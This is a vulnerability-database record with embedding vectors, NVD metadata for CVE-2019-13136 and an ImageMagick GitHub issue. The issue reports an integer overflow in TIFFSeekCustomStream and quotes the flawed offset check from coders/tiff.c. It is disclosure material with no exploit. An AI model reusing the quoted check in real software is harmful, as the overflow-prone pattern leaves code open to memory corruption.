0.0008930328185670078, -0.010179406963288784, 0.022657621651887894, -0.020042728632688522, 0.004938844125717878, -0.0017250035889446735, 0.010402103886008263, -0.0052657057531178, 0.0015301437815651298, 0.012492582201957703, -0.0028627337887883186, -0.020861677825450897, 0.008713916875422001, -0.003110573859885335, 0.005409381352365017, 0.008570241741836071, 0.007223284337669611, -0.005502770189195871, 0.013778476975858212, 0.012600338086485863, -0.022370269522070885, -0.00032978010131046176, -0.012736829929053783, -0.005721875466406345, -0.0032991478219628334, -0.00597330741584301, -0.004303080029785633, -0.019051367416977882, 0.013096018694341183, 0.0029668984934687614, -0.005258521996438503, -0.004565287847071886, 0.012600338086485863, 0.021795568987727165, 0.012636257335543633, -0.008943798020482063, 0.01899389736354351, 0.019798479974269867, -0.006285801529884338, 0.009690910577774048, -0.012370457872748375, -0.02892187237739563, 0.009597521275281906, -0.001287691411562264, 0.012729646638035774, 0.014281341806054115, 0.018476665019989014, -0.011371913366019726, 0.0069682602770626545, 0.007995539344847202, 0.007327449042350054, 0.012075923383235931, 0.028189126402139664, 0.005161541048437357, 0.004123486112803221, 0.02872072532773018, -0.02991323173046112, 0.013419289141893387, -0.0019288432085886598, 0.04272908344864845, -0.0034230679739266634, -0.007352591957896948, -0.03304535895586014, 0.012183679267764091, 0.021105926483869553, 0.0008185011683963239, -0.009238332509994507, 0.0016289206687361002, -0.0036547447089105844, -0.014389097690582275, -0.002604117849841714, -0.018979528918862343, -0.005624894518405199, 0.02063179761171341, 0.027959246188402176, 0.031091371551156044, 0.0005702120251953602, 0.019970890134572983, 0.011608977802097797, 0.02324669063091278, 0.0031500845216214657, -0.004428796470165253, -0.021867405623197556, -0.016924969851970673, 0.010143487714231014, 0.005520729813724756, 0.007065241225063801, -0.015085924416780472, -0.012097474187612534, -0.0004781699099112302, 0.011264156550168991, -0.020588694140315056, 0.036752182990312576, -0.0010649943724274635, 0.011357545852661133, -0.007129895035177469, 0.03453958407044411, 0.0022754601668566465, -0.016824398189783096, 0.003940299618989229, 0.005721875466406345, 0.0006698868819512427, 0.0069826277904212475, -0.008347544819116592, 0.0006460906006395817, -0.017988167703151703, 0.016551414504647255, -0.003114165738224983, 0.012744014151394367, 0.010409287177026272, 0.00897253304719925, -0.0012634461745619774, -0.021220866590738297, 0.01935308612883091, 0.015157761983573437, -0.005984083283692598, 0.006892830599099398, -0.017844492569565773, 0.01856287010014057, 0.0025664030108600855, 0.014583059586584568, 0.0026903231628239155 ]
2,274
CVE-2019-13136
2019-07-01T20:15:11.417000
ImageMagick before 7.0.8-50 has an integer overflow vulnerability in the function TIFFSeekCustomStream in coders/tiff.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "[email protected]", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/fe5f4b85e6b1b54d3b4588a77133c06ade46d891" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1602" }, { "source": "[email protected]", "tags": null, "url": "https://support.f5.com/csp/article/K03512441?utm_source=f5support&amp%3Butm_medium=RSS" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "024CF82C-BA9A-441D-80DD-BDA9FEC819A7", "versionEndExcluding": "7.0.8-50", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1602
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [ y ] I have written a descriptive issue title - [ y ] I have verified that I am using the latest version of ImageMagick - [ y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There is a possible integer overflow vulnerability in TIFFSeekCustomStream in coder/tiff.c ``` case SEEK_CUR: { if ((profile->offset+offset) < 0) return(-1); profile->offset+=offset; break; } ``` https://github.com/ImageMagick/ImageMagick/blob/master/coders/tiff.c#L259 This issue is similar to the one which was fixed in https://github.com/ImageMagick/ImageMagick/commit/8b28a8708ca994c7c9f211d562a8109621cf4d15 and https://github.com/ImageMagick/ImageMagick/commit/114be1716d0a8a10df6f772ef558968a2ad9ab68.
Possible integer overflow in TIFFSeekCustomStream in coder/tiff.c
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1602/comments
2
2019-06-18T11:47:50
2019-07-03T01:30:44Z
https://github.com/ImageMagick/ImageMagick/issues/1602
457,432,764
1,602
true
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : Possible integer overflow in TIFFSeekCustomStream in coder/tiff.c Issue date: --- start body --- ### Prerequisites - [ y ] I have written a descriptive issue title - [ y ] I have verified that I am using the latest version of ImageMagick - [ y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There is a possible integer overflow vulnerability in TIFFSeekCustomStream in coder/tiff.c ``` case SEEK_CUR: { if ((profile->offset+offset) < 0) return(-1); profile->offset+=offset; break; } ``` https://github.com/ImageMagick/ImageMagick/blob/master/coders/tiff.c#L259 This issue is similar to the one which was fixed in https://github.com/ImageMagick/ImageMagick/commit/8b28a8708ca994c7c9f211d562a8109621cf4d15 and https://github.com/ImageMagick/ImageMagick/commit/114be1716d0a8a10df6f772ef558968a2ad9ab68. --- end body ---
1,173
[ -0.0384756475687027, 0.020009052008390427, 0.00007185620052041486, 0.029735079035162926, 0.041531991213560104, 0.02866392955183983, -0.023208213970065117, 0.04364572465419769, -0.026307404041290283, 0.040846455842256546, 0.019737694412469864, -0.0004025732632726431, 0.005123659502714872, 0.02270834520459175, -0.028121214359998703, 0.029206644743680954, 0.0020137589890509844, -0.011954016052186489, -0.01582443155348301, -0.020380383357405663, 0.012653832323849201, -0.007569448556751013, -0.03087763674557209, 0.02902098000049591, -0.014317682944238186, 0.02106591686606407, -0.019566310569643974, -0.001662065158598125, 0.0024047279730439186, -0.003345553297549486, 0.04524530470371246, 0.0371902696788311, -0.01955202780663967, -0.0047808922827243805, 0.031848810613155365, -0.008876249194145203, 0.015924405306577682, 0.06449741125106812, -0.012753806076943874, -0.008040753193199635, -0.017538268119096756, -0.061126865446567535, -0.002065530978143215, 0.045559510588645935, -0.01595296896994114, -0.005834187846630812, -0.006730382330715656, -0.012768087908625603, -0.0445312075316906, 0.018480880185961723, 0.009019069373607635, -0.05255768075585365, -0.04264598712325096, -0.0201090257614851, -0.01695270836353302, -0.03627622500061989, 0.04730191081762314, 0.028306880965828896, 0.013375072740018368, -0.006573280319571495, -0.027349987998604774, 0.04830164834856987, 0.014924666844308376, -0.016552813351154327, -0.002656447933986783, -0.04216039925813675, -0.03390541672706604, 0.03456238657236099, -0.024422181770205498, 0.032105885446071625, -0.00860489159822464, -0.03739021718502045, 0.029735079035162926, 0.04898718371987343, 0.011518415063619614, 0.007398064713925123, 0.04401705786585808, 0.021808579564094543, -0.03861846774816513, -0.0007132063037715852, -0.047416165471076965, 0.05712791159749031, -0.02145153097808361, 0.02296542003750801, 0.04718765616416931, -0.008997646160423756, -0.04333152249455452, -0.0661541223526001, -0.029220927506685257, -0.00971174519509077, 0.00573064386844635, 0.01712409220635891, 0.007326654624193907, -0.00016234592476394027, 0.00005919210525462404, 0.015610202215611935, 0.002942087361589074, -0.02970651350915432, -0.04601653292775154, 0.0029063825495541096, 0.004620220046490431, -0.01798100955784321, 0.002552903490141034, 0.018580853939056396, -0.0020476786885410547, 0.0059484438970685005, -0.029078107327222824, -0.02283688262104988, 0.009440387599170208, 0.09786011278629303, -0.001668313518166542, -0.00744805159047246, -0.04170337691903114, 0.006169814616441727, -0.01733832061290741, 0.01673847809433937, 0.01642427407205105, -0.009611771441996098, -0.035562124103307724, -0.0315631702542305, -0.026735862717032433, -0.02110876329243183, 0.002674300456419587, 0.049844104796648026, -0.02413654327392578, 0.012432461604475975, 0.0001912446168716997, -0.031191840767860413, -0.023508135229349136, 0.003250935347750783, -0.025264818221330643, -0.023193933069705963, 0.031420350074768066, -0.020780278369784355, -0.021437248215079308, 0.014524771831929684, 0.004866584204137325, 0.0270215030759573, 0.008719147183001041, 0.013989197090268135, -0.04224609211087227, -0.011968297883868217, 0.017195502296090126, 0.034962281584739685, 0.005966296419501305, -0.007840805687010288, -0.043874237686395645, -0.00624836515635252, -0.0136178657412529, -0.002444003475829959, 0.005809194408357143, 0.01268953736871481, 0.008719147183001041, -0.005648522172123194, 0.035305049270391464, -0.0038882684893906116, 0.01005451288074255, 0.02759278193116188, 0.002567185554653406, -0.030392048880457878, 0.009219016879796982, -0.03787580505013466, 0.013639288954436779, -0.01049011293798685, -0.009961679577827454, -0.025964636355638504, 0.002479708520695567, 0.030249228700995445, -0.01863798126578331, 0.021308710798621178, 0.015724457800388336, -0.045388124883174896, -0.001979839289560914, -0.029849333688616753, -0.031420350074768066, 0.013824954628944397, -0.006594703532755375, 0.011789772659540176, -0.0020208999048918486, -0.032705727964639664, -0.03036348521709442, -0.006466165650635958, -0.022251321002840996, -0.021565787494182587, 0.03704744949936867, 0.0025993199087679386, 0.0023172509390860796, 0.002470782259479165, -0.0023065395653247833, -0.017609678208827972, 0.025150563567876816, -0.026921529322862625, 0.03147748112678528, -0.0007957739871926606, 0.03830426558852196, 0.008976222947239876, -0.027221450582146645, -0.04721621796488762, 0.04164624959230423, 0.01582443155348301, 0.01206827163696289, -0.020394664257764816, -0.04016092047095299, -0.0042060427367687225, -0.04124635085463524, 0.026821555569767952, -0.04116066172719002, 0.009961679577827454, -0.005184357985854149, -0.036990322172641754, -0.026621606200933456, -0.01439623348414898, 0.04718765616416931, 0.02253696136176586, -0.023422444239258766, 0.02019471675157547, -0.003984672017395496, 0.022651217877864838, -0.014796129427850246, 0.011489851400256157, 0.02460784837603569, -0.013832096010446548, 0.01712409220635891, -0.02729286067187786, -0.007862228900194168, -0.019137850031256676, 0.02088025212287903, 0.01158982515335083, -0.03233439847826958, 0.0014942520065233111, 0.010968559421598911, -0.01612435281276703, -0.014967513270676136, -0.0008881604881025851, 0.009247580543160439, -0.032277271151542664, 0.014867539517581463, -0.010347292758524418, -0.028264034539461136, 0.005245056468993425, 0.031420350074768066, 0.03187737613916397, -0.017766781151294708, 0.005255768075585365, -0.007433769758790731, 0.039846718311309814, -0.006926759146153927, 0.015167460776865482, -0.004102498292922974, 0.01942349039018154, -0.001672776648774743, -0.028078367933630943, 0.04467402771115303, 0.0024190100375562906, 0.005248626694083214, 0.016381429508328438, -0.013567878864705563, 0.041446298360824585, -0.02045179344713688, -0.029120953753590584, 0.023065393790602684, 0.019951922819018364, -0.013303662650287151, 0.016538530588150024, 0.01629573665559292, 0.01998048648238182, -0.016538530588150024, 0.023765211924910545, -0.004402419552206993, -0.048758674412965775, 0.03904692828655243, -0.01652424782514572, 0.001175585319288075, -0.03441956639289856, -0.006462594959884882, 0.007947920821607113, -0.012768087908625603, 0.004895147867500782, 0.0007194546633400023, 0.007041015196591616, -0.018138112500309944, 0.03810431808233261, -0.002743924967944622, 0.00955464318394661, 0.00957606639713049, -0.0014621175359934568, 0.01742401346564293, -0.012896626256406307, -0.024322208017110825, -0.028906723484396935, -0.009833142161369324, 0.011425582692027092, -0.049272824078798294, 0.009940256364643574, 0.02495061606168747, -0.024579284712672234, -0.02110876329243183, 0.0005578897544182837, -0.03250578045845032, -0.005612817592918873, -0.03304849565029144, 0.00569850904867053, -0.01682417094707489, -0.013096573762595654, -0.014996076934039593, -0.005702079739421606, -0.041103534400463104, -0.008512059226632118, -0.012575281783938408, -0.02927805483341217, 0.00843350775539875, -0.02045179344713688, 0.017695371061563492, -0.005145082715898752, -0.005648522172123194, 0.004720193799585104, 0.02857823856174946, -0.005812765099108219, 0.011904028244316578, -0.02533622831106186, -0.004513104911893606, 0.024022286757826805, 0.012053989805281162, 0.017566833645105362, 0.008576327934861183, -0.03096332773566246, -0.001765609486028552, 0.05075814947485924, -0.060612715780735016, 0.016595657914876938, 0.011832619085907936, -0.006451883353292942, -0.02287972904741764, -0.05192927271127701, 0.03653329983353615, -0.014881821349263191, -0.03519079461693764, 0.015096050687134266, 0.0005453930352814496, 0.03144891560077667, -0.004277452360838652, 0.005662804469466209, 0.010747188702225685, -0.0188093651086092, 0.022251321002840996, 0.008597751148045063, 0.0009524294291622937, -0.004763039760291576, -0.008112163282930851, 0.009483233094215393, 0.0008149653440341353, 0.020894533023238182, 0.003509795991703868, 0.022322731092572212, 0.033534083515405655, 0.023593828082084656, -0.028592519462108612, -0.0229225754737854, 0.023365316912531853, -0.03096332773566246, 0.012639550492167473, -0.016724195331335068, -0.026878682896494865, 0.018180958926677704, -0.00352943385951221, 0.01128990389406681, 0.005752066615968943, -0.008247842080891132, -0.017966728657484055, 0.005380735266953707, -0.014481925405561924, 0.04224609211087227, -0.03173455595970154, 0.019266387447714806, -0.03499084711074829, -0.013567878864705563, 0.016724195331335068, -0.015553073957562447, 0.0017165152821689844, 0.018009575083851814, -0.021722888574004173, 0.02196568250656128, 0.037218835204839706, -0.05469997599720955, 0.009054774418473244, 0.015495945699512959, -0.0406465083360672, 0.0037525896914303303, -0.01695270836353302, -0.0270215030759573, -0.028906723484396935, 0.014653309248387814, 0.004252458922564983, -0.03524792194366455, 0.012703819200396538, 0.04704483598470688, -0.0026046757120639086, -0.027664192020893097, 0.00047264419845305383, -0.02832116186618805, 0.027050066739320755, -0.03956107795238495, 0.03427674621343613, 0.008562046103179455, 0.008597751148045063, 0.06643976271152496, 0.007705127354711294, 0.004991551395505667, 0.011468428187072277, 0.00006421311263693497, 0.0032116598449647427, -0.009026209823787212, -0.01893790252506733, 0.010290165431797504, 0.011754067614674568, 0.04487397521734238, 0.023165367543697357, 0.014124875888228416, -0.02486492320895195, 0.008740570396184921, -0.014539053663611412, 0.026707299053668976, -0.009019069373607635, 0.007705127354711294, 0.006319775246083736, -0.004052511416375637, 0.025636151432991028, 0.020080460235476494, 0.036476172506809235, -0.020594611763954163, -0.018409470096230507, 0.009847423993051052, 0.00843350775539875, 0.018866492435336113, -0.005727073177695274, -0.019309233874082565, -0.024722103029489517, -0.029035260900855064, -0.007569448556751013, -0.015810148790478706, -0.02365095540881157, 0.07615150511264801, -0.01362500712275505, -0.016881298273801804, -0.007412346545606852, -0.019309233874082565, -0.04427413269877434, -0.003434815676882863, 0.003018853021785617, -0.024879205971956253, 0.003311633598059416, 0.00879769865423441, 0.007947920821607113, -0.006591132842004299, 0.015096050687134266, 0.0033134189434349537, -0.012332487851381302, -0.02603604644536972, 0.03650473430752754, -0.003834711154922843, -0.0004976376658305526, 0.0022422706242650747, -0.02729286067187786, -0.041531991213560104, 0.0216229148209095, -0.011125660501420498, 0.02205137349665165, 0.024793513119220734, 0.006384043954312801, -0.008612032979726791, 0.012325347401201725, 0.03581920266151428, -0.010061653330922127, 0.018666544929146767, 0.0003851671062875539, 0.019480617716908455, 0.011189930140972137, 0.027449961751699448, 0.0036008437164127827, -0.04133204370737076, 0.017652524635195732, -0.0354764349758625, -0.0278927031904459, 0.007290949579328299, 0.0384756475687027, 0.01678132452070713, 0.01438195165246725, -0.022151347249746323, -0.006558998487889767, 0.029935026541352272, 0.028292598202824593, 0.02936374768614769, -0.00034767689066939056, -0.057842012494802475, 0.0011104238219559193, 0.03247721865773201, -0.015096050687134266, -0.0057734898291528225, 0.04390279948711395, 0.021265864372253418, 0.006619696971029043, 0.018023855984210968, 0.03536217659711838, 0.0018959325971081853, 0.014053466729819775, -0.018452316522598267, -0.020094742998480797, -0.03113471157848835, -0.019523464143276215, -0.037475910037755966, 0.012511013075709343, -0.022365577518939972, 0.007016021758317947, -0.04121778905391693, -0.006751805078238249, -0.0039632488042116165, 0.05241486057639122, -0.030849073082208633, 0.025393357500433922, -0.012968036346137524, -0.003607984632253647, -0.026664452627301216, 0.016681350767612457, 0.023579545319080353, 0.03173455595970154, 0.01234676968306303, 0.016881298273801804, 0.0008573649683967233, 0.007490897551178932, -0.0035562124103307724, -0.007326654624193907, -0.0050201150588691235, -0.006783939432352781, -0.0003704387927427888, 0.009347554296255112, 0.03878985345363617, -0.013682135380804539, -0.038761287927627563, -0.0011059606913477182, -0.012582422234117985, -0.016067225486040115, 0.011182788759469986, -0.01902359537780285, -0.0018182743806391954, -0.001069363090209663, 0.03987528383731842, -0.0008997645927593112, 0.009797437116503716, 0.010732906870543957, -0.037475910037755966, 0.018923621624708176, -0.0037954356521368027, 0.03104902058839798, -0.011925451457500458, 0.02944943867623806, 0.04384567216038704, -0.00573064386844635, 0.005605676211416721, 0.018452316522598267, 0.013989197090268135, -0.00957606639713049, 0.008547764271497726, 0.005105806980282068, 0.01331794448196888, -0.00510223675519228, -0.0098402826115489, 0.010575804859399796, 0.03216301277279854, -0.04347434267401695, -0.027564218267798424, 0.02672157995402813, -0.005602105986326933, -0.013382213190197945, -0.0025047019589692354, -0.003952537197619677, 0.02712147682905197, 0.034133926033973694, -0.013239393942058086, -0.00294565805234015, 0.007833665236830711, -0.004488111473619938, -0.03104902058839798, 0.013532173819839954, 0.030192101374268532, 0.01695270836353302, -0.01768108829855919, 0.007483756635338068, 0.003458024002611637, -0.004191760439425707, -0.030477741733193398, -0.005455715581774712, 0.010111640207469463, 0.013539315201342106, 0.023279624059796333, 0.010797175578773022, -0.025150563567876816, 0.005070102401077747, 0.012732383795082569, 0.0031723843421787024, -0.023979440331459045, -0.0015237085754051805, 0.02435077168047428, -0.010254460386931896, 0.0019494900479912758, -0.03304849565029144, 0.009476092644035816, -0.015710175037384033, 0.01035443414002657, -0.008083599619567394, 0.0037740126717835665, 0.005137941800057888, 0.0056520928628742695, 0.055242691189050674, -0.0020994506776332855, 0.03904692828655243, 0.01268953736871481, 0.008105022832751274, 0.02115160971879959, -0.018952185288071632, 0.018952185288071632, 0.03853277489542961, -0.05210065469145775, 0.0049558463506400585, 0.005012974143028259, 0.0031973777804523706, 0.006641119718551636, -0.0041132098995149136, 0.006944611668586731, -0.0023886607959866524, -0.021551504731178284, -0.001963771879673004, 0.025964636355638504, 0.013582160696387291, -0.01573874056339264, -0.02477923221886158, 0.03593345731496811, 0.019009312614798546, -0.022108502686023712, -0.014639027416706085, -0.0175097044557333, -0.000727041915524751, 0.01953774504363537, 0.008140727877616882, 0.018566571176052094, -0.007390923798084259, -0.020908815786242485, 0.005655663087964058, 0.023036830127239227, 0.025607585906982422, 0.013703557662665844, -0.014617604203522205, 0.009054774418473244, 0.0010943565284833312, 0.01573874056339264, -0.005844899453222752, -0.014310541562736034, 0.029820770025253296, 0.0622694231569767, -0.026964373886585236, 0.006144821178168058, -0.0201090257614851, 0.0045952266082167625, 0.0016504611121490598, 0.003956107888370752, 0.011868324130773544, -0.01746685989201069, 0.01502464059740305, -0.011846900917589664, 0.034876588732004166, 0.015710175037384033, -0.004598796833306551, 0.01283949799835682, -0.015081768855452538, -0.0059198797680437565, -0.013289380818605423, 0.002336888574063778, 0.020037615671753883, 0.024236517027020454, 0.0018834358779713511, 0.014639027416706085, 0.025978917255997658, -0.017066963016986847, -0.001385351875796914, -0.006708959117531776, -0.005134371109306812, 0.00048335568862967193, 0.0013916002353653312, -0.007462333422154188, -0.011311326175928116, -0.008297828957438469, 0.038675595074892044, 0.0011470213066786528, 0.03333413600921631, 0.006059129256755114, 0.013360789977014065, -0.007533743511885405, 0.009290426969528198, 0.0060698408633470535, -0.004413131158798933, -0.007462333422154188, -0.06318347156047821, 0.009618911892175674, 0.021422967314720154, 0.01051153615117073, -0.0072373924776911736, 0.027792729437351227, 0.0011523771099746227, -0.0073837824165821075, 0.008740570396184921, -0.0035740649327635765, -0.012760947458446026, 0.01643855683505535, -0.043245829641819, -0.0007988981669768691, -0.0031152565497905016, -0.014217709191143513, 0.013103715144097805, 0.012775229290127754, -0.023550981655716896, -0.00468091806396842, 0.0077836778946220875, -0.029849333688616753, -0.02422223426401615, -0.04124635085463524, 0.007498038467019796, 0.02145153097808361, -0.012610986828804016, 0.0013799960725009441, 0.022822601720690727, 0.018138112500309944, -0.003340197494253516, -0.014867539517581463, 0.02395087666809559, -0.008704865351319313, -0.018952185288071632, 0.03927544131875038, 0.007080290466547012, 0.00938325934112072, 0.015981532633304596, -0.011661235243082047, 0.019951922819018364, -0.023579545319080353, -0.004616649355739355, -0.015038922429084778, 0.008847685530781746, -0.00826212391257286, 0.026493068784475327, 0.01795244589447975, -0.01204684842377901, -0.0005699401954188943, 0.006130538880825043, 0.00008530134800821543, 0.006444742437452078, -0.03381972387433052, -0.011482710018754005, -0.026864400133490562, 0.0030884777661412954, -0.029649386182427406, 0.033191315829753876, -0.04687345027923584, -0.0002771596482489258, -0.006801791954785585, 0.005834187846630812, -0.0172954760491848, 0.03273429349064827, 0.018752237781882286, -0.002460070652887225, 0.017838191241025925, 0.024722103029489517, -0.011818337254226208, -0.005648522172123194, -0.007533743511885405, -0.03550499677658081, -0.007962202653288841, 0.0005793127347715199, -0.02175145223736763, 0.007519461214542389, 0.0006520615424960852, 0.012732383795082569, 0.018266649916768074, -0.03153460845351219, 0.013089433312416077, -0.031591735780239105, 0.036304786801338196, 0.008761993609368801, -0.024365054443478584, -0.005148652940988541, 0.01001166645437479, 0.005966296419501305, 0.008212137036025524, -0.01191116962581873, -0.030249228700995445, 0.0410749688744545, -0.01660994067788124, 0.008312110789120197, -0.011618388816714287, 0.008733429946005344, -0.017795344814658165, 0.0075051793828606606, -0.0367618128657341, -0.0007667636964470148, 0.023022549226880074, -0.033962544053792953, -0.007926497608423233, -0.020308973267674446, -0.012461026199162006, -0.00706957932561636, 0.032277271151542664, -0.005923450458794832, 0.03139178827404976, 0.019209260120987892, -0.007008880842477083, -0.003227727022022009, 0.015338844619691372, 0.009169030003249645, -0.010075935162603855, 0.009583206847310066, -0.04090358689427376, 0.0039096917025744915, -0.0016745618777349591, -0.03878985345363617, 0.023922313004732132, -0.01616719923913479, -0.044731155037879944, -0.02170860581099987, -0.030563432723283768, 0.006919618230313063, -0.01489610318094492, 0.013346508145332336, 0.014346246607601643, -0.013260816223919392, -0.03956107795238495, 0.01626717299222946, 0.010947136208415031, 0.009304708801209927, 0.029163798317313194, 0.0027010790072381496, -0.016138635575771332, -0.03187737613916397, 0.028949569910764694, -0.012832357548177242, -0.009490374475717545, -0.015295998193323612, -0.018952185288071632, 0.021337274461984634, -0.03233439847826958, -0.03427674621343613, 0.022979702800512314, 0.01720978319644928, -0.0038632750511169434, 0.012132540345191956, 0.045302435755729675, -0.014439079910516739, 0.013460764661431313, 0.02085168845951557, -0.00312953838147223, -0.007355218753218651, -0.01362500712275505, 0.0015129970852285624, -0.02153722196817398, 0.0078122420236468315, 0.017324039712548256, -0.003631192957982421, -0.027778446674346924, 0.036047711968421936, -0.0005654770648106933, -0.014124875888228416, -0.02166576124727726, 0.03381972387433052, -0.016981272026896477, -0.037247397005558014, -0.005034397356212139, 0.048758674412965775, -0.03087763674557209, 0.01217538584023714, -0.015153178945183754, -0.001272881287150085, -0.018909338861703873, -0.009633193723857403, 0.016809888184070587, 0.010754329152405262, 0.005287902429699898, 0.00509152514860034, -0.007755114231258631, -0.01191116962581873, -0.027878420427441597, -0.00988312903791666, 0.0006788402679376304, -0.023808056488633156, 0.0032830697018653154, 0.028421135619282722, 0.0026028905995190144, -0.026050327345728874, -0.022465551272034645, 0.02659304253757, 0.015210306271910667, -0.0050772433169186115, -0.025264818221330643, -0.01639571040868759, -0.03456238657236099, -0.005009403917938471, 0.008354957215487957, -0.003225941676646471, 0.01678132452070713, 0.005177217070013285, 0.0022119213826954365, 0.02772131934762001, 0.015852995216846466, 0.00027247334946878254, -0.01608150638639927, 0.011147083714604378, -0.01612435281276703, -0.017138373106718063, -0.03162029758095741, -0.021437248215079308, -0.0015969036612659693, -0.02058033086359501, -0.0053164660930633545, -0.01203970704227686, 0.03704744949936867, -0.004973698873072863, 0.020009052008390427, -0.009047633036971092, 0.03464807942509651, 0.0300492811948061, -0.028549674898386, -0.03096332773566246, -0.02079455927014351, 0.0023708082735538483, 0.0007007095264270902, -0.0017781062051653862, 0.009640335105359554, 0.009011927992105484, 0.0049844104796648026, -0.014046325348317623, -0.043531470000743866, -0.040417999029159546, 0.015924405306577682, -0.01206827163696289, -0.020923098549246788, 0.017195502296090126, 0.010804316028952599, 0.000585561094339937, -0.017938164994120598, -0.013389354571700096, -0.026264557614922523, 0.028006959706544876, -0.03407679870724678, -0.0032741434406489134, 0.005391446873545647, -0.03550499677658081, -0.008333534002304077, 0.0031188270077109337, -0.020823124796152115, 0.00446311803534627, 0.02477923221886158, -0.026435941457748413, 0.018109548836946487, 0.011182788759469986, 0.005909168627113104, 0.004627360962331295, 0.0048737251199781895, -0.02205137349665165, -0.017366886138916016, -0.03670468181371689, 0.037990059703588486, -0.04761611297726631, 0.011961156502366066, -0.014439079910516739, -0.024636412039399147, -0.007019591983407736, -0.015581637620925903, 0.01626717299222946, 0.039932411164045334, 0.0011470213066786528, 0.04510248824954033, 0.02927805483341217, -0.03787580505013466, -0.0011613033711910248, -0.010425844229757786, 0.012725242413580418, -0.003629407612606883, 0.05115804448723793, -0.015510228462517262, 0.009618911892175674, -0.006294781807810068, -0.001671884092502296, 0.019709128886461258, -0.01932351663708687, -0.027649909257888794, 0.0027956971898674965, -0.013068010099232197, 0.0038489929866045713, -0.05081527680158615, 0.0030527727212756872, 0.016581377014517784, -0.002563615096732974, -0.050615329295396805, -0.037561602890491486, -0.010825739242136478, -0.04533099755644798, 0.043531470000743866, 0.010140204802155495, -0.030163537710905075, -0.02270834520459175, 0.010875726118683815, 0.0012086123460903764, 0.008512059226632118, -0.013060868717730045, -0.005784200970083475, 0.023493854328989983, 0.020523201674222946, -0.005352171137928963, -0.033705469220876694, -0.000785508775152266, -0.018837928771972656, 0.009476092644035816, -0.0053164660930633545, 0.016552813351154327, 0.008297828957438469, -0.022936856374144554, 0.007101713679730892, -0.008619173429906368, -0.021223019808530807, 0.005348600912839174, 0.00015654387243557721, -0.00797648448497057, 0.022108502686023712, -0.0013594657648354769, 0.0016522463411092758, 0.020551767200231552, -0.011361313052475452, 0.03304849565029144, -0.00013735245738644153, -0.006719670724123716, -0.024664975702762604, -0.0017959587275981903, -0.009875987656414509, -0.029006697237491608, 0.0018870063358917832, 0.03262003883719444, -0.009633193723857403, -0.025636151432991028, -0.000002737146587605821, 0.007076720241457224, 0.010954277589917183, -0.003234867937862873, -0.027007220312952995, -0.018523724749684334, -0.00782652385532856, 0.015110332518815994, -0.019923359155654907, 0.01915213279426098, -0.00910476129502058, -0.02217991277575493, 0.0036061995197087526, 0.0029777924064546824, -0.022065656259655952, 0.007251674309372902, -0.009483233094215393, 0.0013585732085630298, -0.013453623279929161, -0.014710437506437302, -0.05130086466670036, -0.010147345252335072, -0.015367408283054829, -0.01803813874721527, 0.016538530588150024, -0.00392397353425622, -0.015581637620925903, -0.005884174723178148, 0.017024118453264236, -0.0050201150588691235, -0.01669563166797161, 0.009790295735001564, 0.0008511166088283062, 0.02832116186618805, -0.01081145741045475, -0.011675517074763775, -0.02503630705177784, 0.0037811535876244307, -0.0023440297227352858, -0.007433769758790731, -0.00569850904867053, -0.02396515943109989, 0.024807795882225037, -0.013375072740018368, 0.007983625866472721, -0.0047023412771523, 0.016552813351154327, -0.017452577129006386, -0.019380643963813782, 0.0068482086062431335, -0.015724457800388336, -0.01923782378435135, 0.010468689724802971, 0.007619435433298349, 0.09311849623918533, -0.0229225754737854, -0.022508397698402405, -0.009411823935806751, -0.013703557662665844, 0.003838281612843275, 0.008747711777687073, -0.010740047320723534, -0.002965295687317848, 0.005984148941934109, 0.019209260120987892, 0.014467643573880196, -0.01031158771365881, 0.024922052398324013, 0.028249751776456833, 0.0048630135133862495, -0.003063484327867627, -0.013503610156476498, 0.008669160306453705, -0.030734816566109657, 0.024293644353747368, 0.01603866182267666, 0.004202472046017647, -0.00431315740570426, 0.007519461214542389, -0.018009575083851814, -0.02784985676407814, -0.005627099424600601, 0.001860227668657899, -0.015610202215611935, -0.009933115914463997, -0.006191237363964319, -0.02680727280676365, -0.006405467167496681, 0.00524148577824235, -0.00007598458614666015, 0.028349725529551506, -0.01780962571501732, -0.023836622014641762, -0.032762859016656876, 